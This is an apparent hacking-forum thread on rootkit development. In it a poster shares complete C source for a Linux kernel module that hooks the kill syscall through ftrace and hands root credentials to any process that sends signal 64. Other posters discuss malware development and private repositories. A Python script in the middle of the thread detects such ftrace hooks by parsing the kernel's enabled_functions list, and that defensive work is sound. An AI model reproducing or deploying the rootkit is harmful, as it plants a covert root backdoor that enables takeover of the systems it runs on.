[REQUEST] Resources for Rootkit Development?
#11
(01-21-2021, 05:51 AM)Vector Wrote:
(01-21-2021, 05:08 AM)ueax Wrote: Sure! I had followed the resource in DeepLogic's post, which had a walkthrough of how to write an LKM for Linux in C.
After going through a few sections, I made an LKM such that, if a user had permission to use 'insmod', they could insert the LKM below;
then, if a user were to run 'kill -64 123' (123 being any number), they would escalate to root.

I'm relatively new to this kind of thing so go easy on me lol.

ftrace_helper.h can be found here: https://github.com/xcellerator/linux_ker...e_helper.h
ftrace_helper.h basically gives some higher-level functions that can be used to hook existing syscalls.

Code:
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/kallsyms.h>
#include <linux/version.h>

#include "ftrace_helper.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("ueax");
MODULE_DESCRIPTION("syskill esc");
MODULE_VERSION("0.3");
#if defined(CONFIG_X86_64) && (LINUX_VERSION_CODE >= KERNEL_VERSION(4,17,0))
#define PTREGS_SYSCALL_STUBS 1
#endif

#ifdef PTREGS_SYSCALL_STUBS
static asmlinkage long (*orig_kill)(const struct pt_regs *);

asmlinkage int hook_kill(const struct pt_regs *regs)
{
    void set_root(void);
    int sig = regs->si;
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
    return orig_kill(regs);
}

#else
static asmlinkage long (*orig_kill)(pid_t pid, int sig);

static asmlinkage int hook_kill(pid_t pid, int sig)
{
    void set_root(void);
    if (sig == 64)
    {
        printk(KERN_INFO "RootKit: Giving root...\n");
        set_root();
        return 0;
    }
    return orig_kill(pid, sig);
}
#endif

void set_root(void)
{
    struct cred *root;
    root = prepare_creds();

    if (root == NULL)  return;

    root->uid.val = root->gid.val = 0;
    root->euid.val = root->egid.val = 0;
    root->suid.val = root->sgid.val = 0;
    root->fsuid.val = root->fsgid.val = 0;

    commit_creds(root);
}

static struct ftrace_hook hooks[] =
{
    HOOK("sys_kill", hook_kill, &orig_kill),
};

static int __init rootkit_init(void)
{
    int err;
    err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
    if (err)
        return err;
    printk(KERN_INFO "RootKit: Loaded.\n");
    return 0;
}

static void __exit rootkit_exit(void)
{
    fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
    printk(KERN_INFO "RootKit: Unloaded\n");
}
module_init(rootkit_init);
module_exit(rootkit_exit);

I've also done a little bit of other malware developing in the past, but it isn't as interesting as this.

Not bad at all, how are you planning to load the kernel modules? Also, it's good to know you have some experience with MalDev, I have adjusted the Data Stream to your Secure Repo accordingly. It will be ready in 30 minutes. I have also added you on XMPP.

I have sent you a PM with the pertinent information related to your Secure Repo.

You use "insmod" to insert the kernel module. You need root to use it usually. Of course that's why it's called a rootkit. I've been following the tutorial as well, which is why I recommended it. The author is really good at explaining things well.
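A defender-side footnote to the module above, added here as an example and not code from any post in this thread or from the ftrace_helper project. A hook installed the way ftrace_helper.h does it registers an ftrace callback with IPMODIFY set (the callback may change the return IP, which is what lets it replace the original function), and the kernel lists every traced function together with its flags and callback in enabled_functions under the tracing filesystem. The script below parses that text and flags IPMODIFY callbacks that live in a loadable module, separating them from plain tracing (no IPMODIFY) and from livepatch, whose handler is built-in kernel code. The line layout is my reading of t_show() in kernel/trace/ftrace.c and the sample lines are constructed, not captured from a real machine; a module that tampers with the tracing interface itself can hide from this view, so treat a clean result as one signal and still compare the loaded module list against a known-good baseline.

```python
"""Spot ftrace hooks that redirect kernel functions into a loadable module.

Added detection example; not code from this thread or from ftrace_helper.h.
Parses the text the kernel exposes at /sys/kernel/tracing/enabled_functions
(/sys/kernel/debug/tracing/enabled_functions on older kernels). The line format
is an assumption based on t_show() in kernel/trace/ftrace.c.
"""
import re
from dataclasses import dataclass
from typing import FrozenSet, List, Optional

# One line per traced function:
#   <func> (<refcount>) [R] [I] [D]\ttramp: <addr> (<ops->func>) -><next callback>
# R = callback receives pt_regs, I = IPMODIFY (callback may change the return IP,
# i.e. replace the function), D = direct call.  Flag letters are an assumption.
LINE_RE = re.compile(
    r"^(?P<func>\S+)\s+\((?P<count>\d+)\)"
    r"(?P<flags>(?:\s+[RIDMO])*)\s*"
    r"(?:tramp:\s*(?P<tramp>\S+)\s*\((?P<callback>[^)]*)\))?"
)
MODULE_RE = re.compile(r"\[([^\]]+)\]\s*$")   # "%pS" appends " [modname]" for module symbols
SYSCALL_RE = re.compile(r"^(?:__(?:x64|ia32|se|do)_)?sys_|^do_sys")

# Constructed sample (not a real capture): a kill() entry hooked with
# SAVE_REGS + IPMODIFY by a thunk inside a module, next to two benign entries
# (the function tracer, and a livepatch whose handler is built-in kernel code).
SAMPLE_ENABLED_FUNCTIONS = """\
__x64_sys_kill (1) R I\ttramp: 0xffffffffc0a6e000 (fh_ftrace_thunk+0x0/0x50 [rootkit]) ->ftrace_ops_assist_func+0x0/0xb0
schedule (1)\ttramp: 0xffffffffc0a7c000 (function_trace_call+0x0/0x120) ->ftrace_ops_assist_func+0x0/0xb0
do_sys_openat2 (1) R I\ttramp: 0xffffffffc09f1000 (klp_ftrace_handler+0x0/0x140) ->ftrace_ops_assist_func+0x0/0xb0
"""


@dataclass
class FtraceHook:
    func: str
    ipmodify: bool
    callback: Optional[str]
    module: Optional[str]

    @property
    def redirects_syscall(self) -> bool:
        """True when an IPMODIFY hook sits on a syscall entry function."""
        return self.ipmodify and bool(SYSCALL_RE.match(self.func))


def parse_enabled_functions(text: str) -> List[FtraceHook]:
    """Turn enabled_functions text into records; lines that do not parse are skipped."""
    hooks: List[FtraceHook] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        callback = m.group("callback")
        module = None
        if callback:
            mod = MODULE_RE.search(callback)
            module = mod.group(1) if mod else None
        hooks.append(FtraceHook(
            func=m.group("func"),
            ipmodify="I" in m.group("flags").split(),
            callback=callback,
            module=module,
        ))
    return hooks


def find_suspicious_hooks(hooks: List[FtraceHook],
                          allowed_modules: FrozenSet[str] = frozenset()) -> List[str]:
    """Report IPMODIFY hooks whose callback lives in a module not on the allow-list.

    Plain tracing (function tracer, kprobes, perf) does not set IPMODIFY, and the
    main built-in IPMODIFY user, livepatch's klp_ftrace_handler, is not module
    code, so what remains is a module replacing kernel functions at runtime.
    """
    findings: List[str] = []
    for h in hooks:
        if not h.ipmodify or h.module is None or h.module in allowed_modules:
            continue
        kind = "syscall entry" if h.redirects_syscall else "kernel function"
        findings.append(f"{h.func}: {kind} redirected by module '{h.module}' ({h.callback})")
    return findings


if __name__ == "__main__":
    try:
        with open("/sys/kernel/tracing/enabled_functions") as fh:   # needs root
            text = fh.read()
    except OSError:
        text = SAMPLE_ENABLED_FUNCTIONS   # fall back to the constructed sample
    for finding in find_suspicious_hooks(parse_enabled_functions(text)):
        print("SUSPICIOUS", finding)
```

Run as root it reads the live tracing file; without access it falls back to the constructed sample and reports the hooked `__x64_sys_kill` entry while staying silent on the function tracer and the livepatch line.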
#12
(01-21-2021, 03:51 PM)DeepLogic Wrote:
(01-21-2021, 05:51 AM)Vector Wrote:
Not bad at all, how are you planning to load the kernel modules? Also, it's good to know you have some experience with MalDev, I have adjusted the Data Stream to your Secure Repo accordingly. It will be ready in 30 minutes. I have also added you on XMPP.

I have sent you a PM with the pertinent information related to your Secure Repo.

You use "insmod" to insert the kernel module. You need root to use it usually. Of course that's why it's called a rootkit. I've been following the tutorial as well, which is why I recommended it. The author is really good at explaining things well.

Oh lmao, my bad, I thought he meant he was working on a kernel module that would make it so a user without root could use `insmod` to load what he had posted in code tags. Which is why I was wondering how the kernel module that would affect `insmod` would be loaded in the first place if that were the scenario.

You can tell me I'm a big dumb now if you'd like :sleepy:
#13
(01-21-2021, 03:59 PM)Vector Wrote: Oh lmao, my bad, I thought he meant he was working on a kernel module that would make it so a user without root could use `insmod` to load what he had posted in code tags. Which is why I was wondering how the kernel module that would affect `insmod` would be loaded in the first place if that were the scenario.

You can tell me I'm a big dumb now if you'd like :sleepy:

Lol it happens dude. No sweat. But we're going to have to demote you for that one XD
#14
(01-22-2021, 02:58 PM)DeepLogic Wrote:
(01-21-2021, 03:59 PM)Vector Wrote: Oh lmao, my bad, I thought he meant he was working on a kernel module that would make it so a user without root could use `insmod` to load what he had posted in code tags. Which is why I was wondering how the kernel module that would affect `insmod` would be loaded in the first place if that were the scenario.

You can tell me I'm a big dumb now if you'd like :sleepy:

Lol it happens dude. No sweat. But we're going to have to demote you for that one XD

My position in the hierarchy is unassailable, there is no 'we' with the authority to demote me :sleepy: